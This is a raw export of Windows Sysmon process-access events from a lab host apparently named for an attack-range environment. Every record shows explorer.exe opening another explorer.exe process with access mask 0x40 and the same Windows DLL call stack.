22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695039Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6C14-603D-B687-00000000AD01}8724C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6BD8-603D-AD87-00000000AD01}6060C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:52:57.223{05ADC7E1-1E7A-603D-D07D-00000000AD01}57964472C:\Windows\explorer.exe{05ADC7E1-6AAC-603D-8787-00000000AD01}8752C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001695022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 